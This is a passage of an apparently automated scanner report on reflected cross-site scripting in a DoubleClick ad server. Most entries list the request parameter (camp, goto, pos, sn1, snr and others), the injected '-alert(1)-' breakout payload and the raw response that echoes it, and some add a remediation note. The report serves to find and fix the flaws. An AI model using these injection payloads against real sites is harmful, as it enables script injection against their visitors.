document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ff51d'-alert(1)-'ce15ab17f86&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=a ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ece3a"-alert(1)-"92527edee20 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:00 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ece3a"-alert(1)-"92527edee20&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=a ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1264b'-alert(1)-'3e77e92286a was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... &opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=1264b'-alert(1)-'3e77e92286ahttp://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3f4"-alert(1)-"ed84a2146c5 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... &opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=aa3f4"-alert(1)-"ed84a2146c5http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = " ...[SNIP]...
4.30. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/N4300.NYTimes/B5008440.7
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52120"-alert(1)-"e9a993e1182 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:22:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6713
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&52120"-alert(1)-"e9a993e1182=1http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
4.31. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/N4300.NYTimes/B5008440.7
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1eb3b'-alert(1)-'47541a30f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:22:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6713
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&1eb3b'-alert(1)-'47541a30f9f=1http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eab1c'-alert(1)-'f3739ac3557 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 91%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryeab1c'-alert(1)-'f3739ac3557&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer- ...[SNIP]...
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fec93"-alert(1)-"12a793669de was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:44 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 91%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfec93"-alert(1)-"12a793669de&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer- ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e822"-alert(1)-"4c3ac561287 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle5e822"-alert(1)-"4c3ac561287&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotel ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2c4d'-alert(1)-'30c800381f4 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:56 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddlee2c4d'-alert(1)-'30c800381f4&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotel ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0b14"-alert(1)-"7dfe82f805d was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... e=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacfb0b14"-alert(1)-"7dfe82f805d&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5acee'-alert(1)-'0d1577c5b6e was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... e=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf5acee'-alert(1)-'0d1577c5b6e&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3de13'-alert(1)-'20284093fee was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... %3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e33de13'-alert(1)-'20284093fee&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a5cf"-alert(1)-"9d93ddc41f was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6697
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... %3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e39a5cf"-alert(1)-"9d93ddc41f&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUr ...[SNIP]...
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90833'-alert(1)-'1a292f51b94 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... times.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90833'-alert(1)-'1a292f51b94&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e889c"-alert(1)-"f675ac94119 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... times.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclicke889c"-alert(1)-"f675ac94119&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ed64"-alert(1)-"a101d628bd6 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=12898020729ed64"-alert(1)-"a101d628bd6&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wm ...[SNIP]...
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c075a'-alert(1)-'2933f51287e was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072c075a'-alert(1)-'2933f51287e&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2951d"-alert(1)-"f11c4fafd07 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:35 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/11c/%2a/e%3B232517680%3B0-0%3B0%3B56322591%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto2951d"-alert(1)-"f11c4fafd07&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe6d8'-alert(1)-'94632e14065 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/11c/%2a/e%3B232517680%3B0-0%3B0%3B56322591%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotofe6d8'-alert(1)-'94632e14065&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= ...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cfd7'-alert(1)-'0203b74b4cd was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d961"-alert(1)-"dd73ef3e141 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:25 GMT Expires: Mon, 15 Nov 2010 07:24:25 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6110
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... cs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.22d961"-alert(1)-"dd73ef3e141&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallo ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d9ae"-alert(1)-"9a6023687c5 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:16 GMT Expires: Mon, 15 Nov 2010 07:24:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6112
